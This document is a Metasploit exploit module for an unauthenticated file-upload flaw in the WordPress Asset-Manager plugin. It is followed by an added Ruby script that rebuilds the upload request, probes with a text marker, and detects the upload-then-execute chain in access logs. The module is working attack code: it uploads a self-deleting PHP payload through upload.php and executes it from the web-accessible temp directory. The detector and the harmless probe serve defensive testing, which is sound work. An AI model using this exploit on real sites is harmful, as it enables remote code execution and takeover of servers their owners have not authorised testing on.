This is the Metasploit module for the file-upload vulnerability in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin's upload.php accepts file uploads, PHP files included, from unauthenticated users and writes them to a temp directory under the web root, so an attacker can upload a PHP file and then request it directly to execute arbitrary code on the server.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    # Random name for the dropped PHP file; the payload deletes itself once executed.
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # upload.php reads the file from the multipart field named "Filedata".
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # A successful upload answers 200 and echoes the stored file name back.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The plugin stores uploads under wp-content/uploads/assets/temp/, inside the web root.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
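As an added example (not part of the Metasploit module above, nor of the plugin's own code), here is a standalone Ruby script that covers the same two steps without the framework: it builds the multipart/form-data body with the Filedata field the module uses, derives the temp-directory URL the module requests afterwards, applies the module's success check (HTTP 200 with the file name echoed back), and on the defender side flags the upload-then-execute pattern in web server access logs. The host, port, probe file name and the sample log lines are constructed assumptions; the probe uploads a harmless text marker rather than PHP, so it confirms that the endpoint accepts unauthenticated uploads without planting executable code.

```ruby
# Added example, not the Metasploit module or the plugin's code.
# Paths are the ones the module above requests; everything else is assumed.
require 'net/http'
require 'uri'
require 'securerandom'

UPLOAD_PATH = 'wp-content/plugins/asset-manager/upload.php'
TEMP_PATH   = 'wp-content/uploads/assets/temp/'

# Normalise the WordPress base path the way the module does (ensure a trailing '/').
def wp_base(path)
  path = path.dup
  path << '/' unless path.end_with?('/')
  path
end

# Build a multipart/form-data body with one file part named "Filedata",
# the field upload.php reads. Returns [body, boundary].
def build_multipart(filename, content, boundary = nil)
  boundary ||= "----AssetManagerProbe#{SecureRandom.hex(8)}"
  body = +""
  body << "--#{boundary}\r\n"
  body << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{filename}\"\r\n"
  body << "Content-Type: application/octet-stream\r\n\r\n"
  body << content << "\r\n"
  body << "--#{boundary}--\r\n"
  [body, boundary]
end

# Mirror the module's success test: HTTP 200 and the uploaded file name echoed back.
def upload_succeeded?(code, body, filename)
  code.to_i == 200 && body.to_s.include?(filename)
end

# Where the upload lands, per the module: <base>/wp-content/uploads/assets/temp/<name>
def temp_url(base_uri, filename)
  "#{wp_base(base_uri)}#{TEMP_PATH}#{filename}"
end

# Non-destructive probe: upload a text marker (not PHP) and report whether the
# plugin accepted it unauthenticated. Network call; not exercised offline.
def probe(host, port, base_uri, use_ssl: false)
  marker_name = "am_probe_#{SecureRandom.hex(4)}.txt"
  body, boundary = build_multipart(marker_name, "asset-manager probe\n")
  http = Net::HTTP.new(host, port)
  http.use_ssl = use_ssl
  req = Net::HTTP::Post.new("#{wp_base(base_uri)}#{UPLOAD_PATH}")
  req['Content-Type'] = "multipart/form-data; boundary=#{boundary}"
  req.body = body
  res = http.request(req)
  { accepted: upload_succeeded?(res.code, res.body, marker_name),
    location: temp_url(base_uri, marker_name) }
end

# Defender side: flag a client that POSTs to upload.php (200) and then GETs a
# .php file from the temp directory. Lines are in combined (Apache/nginx) format.
LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) [^"]*" (\d{3})/
def detect_exploit_chain(log_lines)
  uploaded = {}
  hits = []
  log_lines.each do |line|
    m = LOG_RE.match(line) or next
    ip, method, path, status = m[1], m[2], m[3], m[4]
    if method == 'POST' && path.include?(UPLOAD_PATH) && status == '200'
      uploaded[ip] = true
    elsif method == 'GET' && uploaded[ip] && path.include?(TEMP_PATH) && path =~ /\.php(\?|$)/
      hits << { ip: ip, path: path }
    end
  end
  hits
end

# Constructed sample log lines (not real traffic) for the detector.
SAMPLE_LOG = [
  '10.0.0.5 - - [26/May/2012:10:00:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
  '10.0.0.5 - - [26/May/2012:10:00:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxd.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [26/May/2012:10:01:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 1024 "-" "Mozilla/5.0"'
]

if __FILE__ == $0
  puts detect_exploit_chain(SAMPLE_LOG).inspect
end
```

Running the file prints the one flagged client from the embedded sample; probe('target.example', 80, '/wordpress') sends the marker upload to a host you are authorised to test and returns whether it was accepted together with the URL where the plugin would have stored it. The detector only reports the full chain (accepted POST followed by a GET for a .php file in the temp directory from the same client); a lone POST to upload.php is worth alerting on as well, but is left out here to keep the sample focused on the pattern the module produces.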